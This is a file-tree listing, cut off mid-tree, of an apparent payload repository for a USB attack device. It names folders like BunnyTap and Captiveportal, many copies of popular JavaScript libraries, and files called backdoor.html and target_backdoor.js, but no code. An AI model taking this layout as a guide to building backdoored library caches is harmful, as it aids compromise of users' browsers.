├── .gitignore ├── README.md └── payloads ├── library ├── 90sMode │ ├── payload.txt │ ├── r.ps1 │ └── readme.md ├── BunnyTap │ ├── README.md │ ├── alexa1m.sh │ ├── backdoor.html │ ├── backend_server.js │ ├── bunnytap.js │ ├── install.sh │ ├── js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.10.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.10.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.11.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.11.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.11.2__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.11.4__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.6.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.6__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.7.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.7.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.8.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.8.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.8.2__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.8.3__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.9.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.9.4__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__1.0.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__1.0.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__1.0.2__angular-material.min.js │ │ ├── 
ajax.googleapis.com__ajax__libs__angular_material__1.0.3__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__1.0.4__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__1.0.5__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.7__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.8__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.10__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.11__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.12__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.13__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.14__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.15__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.16__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.17__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.18__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.19__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.20__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.21__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.22__angular.min.js │ │ ├── 
ajax.googleapis.com__ajax__libs__angularjs__1.2.23__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.24__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.25__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.26__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.27__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.7__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.8__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.9__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.10__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.11__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.12__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.13__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.14__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.15__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.16__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.17__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.18__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.19__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.2__angular.min.js │ │ ├── 
ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.7__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.8__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.9__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.10__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.11__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.12__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.13__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.14__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.15__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.16__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.17__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.3__angular.min.js │ │ ├── 
ajax.googleapis.com__ajax__libs__angularjs__1.3.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.7__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.8__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.9__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-rc.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-rc.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-rc.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.7__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.8__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.9__angular.min.js │ │ ├── 
ajax.googleapis.com__ajax__libs__angularjs__1.5.0-beta.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.5.0-beta.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.5.0-beta.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.5.0-rc.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.5.0-rc.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.5.0-rc.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.1.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.10.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.10.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.10.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.10.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.10.4__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.2.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.2.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.3.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.3.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.3.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.4__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.5__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.6__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.5.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.5.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.5.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.5.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.5.4__dojo__dojo.js │ │ ├── 
ajax.googleapis.com__ajax__libs__dojo__1.6.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.6.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.6.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.6.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.4__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.5__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.6__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.7__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.8__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.10__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.4__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.5__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.6__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.7__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.8__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.9__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.4__dojo__dojo.js │ │ ├── 
ajax.googleapis.com__ajax__libs__dojo__1.9.5__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.6__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.7__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__ext-core__3.0.0__ext-core.js │ │ ├── ajax.googleapis.com__ajax__libs__ext-core__3.1.0__ext-core.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.10.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.10.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.10.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.11.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.11.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.11.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.11.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.12.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.12.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.12.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.2.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.2.6__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.3.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.3.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.3.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.4.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.4.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.4.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.4.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.4.4__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.5.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.5.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.5.2__jquery.min.js │ │ ├── 
ajax.googleapis.com__ajax__libs__jquery__1.6.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.6.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.6.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.6.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.6.4__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.7.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.7.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.7.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.8.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.8.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.8.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.8.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.9.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.9.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.0.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.0.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.0.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.0.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.4__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.2.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.2.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.2.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquerymobile__1.4.0__jquery.mobile.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquerymobile__1.4.1__jquery.mobile.min.js │ │ ├── 
ajax.googleapis.com__ajax__libs__jquerymobile__1.4.2__jquery.mobile.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquerymobile__1.4.3__jquery.mobile.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquerymobile__1.4.4__jquery.mobile.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquerymobile__1.4.5__jquery.mobile.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.10.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.10.1__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.10.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.10.3__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.10.4__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.11.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.11.1__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.11.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.11.3__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.11.4__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.5.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.5.3__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.6.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.7.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.7.1__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.7.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.7.3__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.10__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.11__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.12__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.13__jquery-ui.min.js │ │ ├── 
ajax.googleapis.com__ajax__libs__jqueryui__1.8.14__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.15__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.16__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.17__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.18__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.19__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.1__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.20__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.21__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.22__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.23__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.24__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.4__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.5__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.6__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.7__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.8__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.9__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.9.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.9.1__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.9.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.1.1__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.1.2__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.1__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.2__mootools.min.js │ │ ├── 
ajax.googleapis.com__ajax__libs__mootools__1.2.3__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.4__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.5__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.0__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.1__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.2__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.0__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.1__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.2__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.3__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.4__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.5__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.5.0__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.5.1__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.5.2__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.6.0__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.6.0.2__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.6.0.3__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.6.1.0__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.7.0.0__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.7.1.0__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.7.2.0__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.7.3.0__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.1__scriptaculous.js │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.2__scriptaculous.js │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.3__scriptaculous.js │ │ ├── 
ajax.googleapis.com__ajax__libs__scriptaculous__1.9.0__scriptaculous.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.0.0__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.0.1__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.1.0__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.1.1__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.1.2__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.2.0__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.3.0__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.3.1__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.3.2__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__swfobject__2.1__swfobject.js │ │ ├── ajax.googleapis.com__ajax__libs__swfobject__2.2__swfobject.js │ │ ├── ajax.googleapis.com__ajax__libs__threejs__r67__three.min.js │ │ ├── ajax.googleapis.com__ajax__libs__threejs__r68__three.min.js │ │ ├── ajax.googleapis.com__ajax__libs__threejs__r69__three.min.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.0__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.10__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.18__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.2__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.3__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.6__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.6.16__webfont.js │ │ └── ajax.googleapis.com__ajax__libs__webfont__2016.__webfont.js │ ├── payload.txt │ ├── target_backdoor.js │ └── target_injected_xhtmljs.html ├── Captiveportal │ ├── README.md │ ├── captiveportal │ ├── payload.txt │ └── portal.html ├── DuckyInstall │ ├── DuckToolkit-1.0.1.tar.gz │ ├── install.sh │ ├── payload.txt │ └── readme.txt ├── DuckyTemplate │ ├── ducky_script.txt │ ├── payload.txt │ └── readme.md ├── ExecutableInstaller │ ├── 